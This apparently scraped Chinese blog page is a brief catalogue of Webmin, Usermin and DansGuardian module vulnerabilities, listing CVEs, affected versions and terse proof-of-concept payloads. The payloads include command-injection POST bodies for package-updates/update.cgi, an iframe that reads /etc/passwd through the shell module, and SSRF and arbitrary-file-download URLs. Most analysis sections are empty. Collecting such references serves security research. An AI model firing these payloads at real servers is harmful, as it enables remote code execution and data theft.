zoukankan      html  css  js  c++  java

  • 应用安全

    简介

    开发语言
PHP

    用途
    系统管理

     

    CVE-2019-15642

    Date
    2019.7

    类型
    远程代码执行

    影响范围
    Webmin <= 1.920

    复现
    POC|EXP
    OBJECT Socket;print "Content-Type: text/plain

";$cmd='id'; print "$cmd

";
     

    分析

    反序列化导致远程代码执行

    CVE-2019-15107

    Date
2019

类型
远程代码执行
    
影响范围

    Webmin <= 1.920

    前置条件
    /password_change.cgi可访问

    复现
    POC | EXP


    
分析

    CVE-2019-12840

    Date
2019.6

类型
远程代码执行

影响范围
v 1.910

复现
    POC|EXP
    (1)
    POST: https://url/package-updates/update.cgi 
    Data: mode=updates&search=&u=apt/apt&u=;${command};/apt&ok_top=Update+Selected+Packages
    mode=updates&search=&u=apt/apt&u=;echo ”124“ > asd.txt;%2Fapt&ok=Update+Selected+Packages
    (2)
    POST: https://url/package-updates/update.cgi 
    Data: mode=new&search=&u=;${command};/apt&ok_top=Update+Selected+Packages
    

分析

    XSS vulnerability that leads to Remote Code Execution

    Date
2017

类型
XSS导致远程代码执行

影响范围
Webmin version 1.850

    前置条件
    /at/create_job.cgi可访问
     

    CSRF

    Date
2017

类型
CSRF

影响范围
Webmin version 1.850

    SSRF

    Date
2017

类型
SSRF

    影响范围
Webmin version     1.850

    复现
    POC|EXP
    https://xx.org:8443/tunnel/link.cgi/https://baidu.com

    HTML Email Command Execution Vulnerability

    Date

类型
远程命令执行

影响范围
    Usermin versions <= 1.080
    
复现
POC    |EXP
<iframe src='/shell/index.cgi?cmd=cat+%2Fetc%2Fpasswd&pwd=%2Fhome%2Fv
ictim&history=' height=0 width=0></iframe>

    任意文件下载

    Date
2004

类型
任意文件下载

影响范围
DansGuardian Webmin Module DansGuardian Webmin Module 0.5.8
    DansGuardian Webmin Module DansGuardian Webmin Module 0.5.6
    DansGuardian Webmin Module DansGuardian Webmin Module 0.5.5
    DansGuardian Webmin Module DansGuardian Webmin Module 0.5.3
    DansGuardian Webmin Module DansGuardian Webmin Module 0.5.2
    DansGuardian Webmin Module DansGuardian Webmin Module 0.5.1
    DansGuardian Webmin Module DansGuardian Webmin Module 0.4.2
    DansGuardian Webmin Module DansGuardian Webmin Module 0.4.1
    DansGuardian Webmin Module DansGuardian Webmin Module 0.3.7 a
    DansGuardian Webmin Module DansGuardian Webmin Module 0.3.7
    DansGuardian Webmin Module DansGuardian Webmin Module 0.3.6
    DansGuardian Webmin Module DansGuardian Webmin Module 0.3.5 a
    DansGuardian Webmin Module DansGuardian Webmin Module 0.3.5
    DansGuardian Webmin Module DansGuardian Webmin Module 0.3.4
    DansGuardian Webmin Module DansGuardian Webmin Module 0.3.3
    DansGuardian Webmin Module DansGuardian Webmin Module 0.3.2
    DansGuardian Webmin Module DansGuardian Webmin Module 0.3.1
    DansGuardian Webmin Module DansGuardian Webmin Module 0.2.1
    DansGuardian Webmin Module DansGuardian Webmin Module 0.2 .0
    
前置条件
    /dansguardian/edit.cgi 可访问

复现
POC|EXP
    https://www.xx.com:10000/dansguardian/edit.cgi?file=[FILE]
  • 相关阅读:
    冲刺(9)
    冲刺(8)
    冲刺(7)
    C#的post请求 捕获错误代码的内容
    [转载]Memory Limits for 32-bit and 64-bit processes
    IIS 503
    识别chrome浏览器
    时间同步
    修改Visual Studio启动画面授权信息
    Temporary ASP.NET Files权限问题
  • 原文地址:https://www.cnblogs.com/AtesetEnginner/p/12055981.html
Copyright © 2011-2022 走看看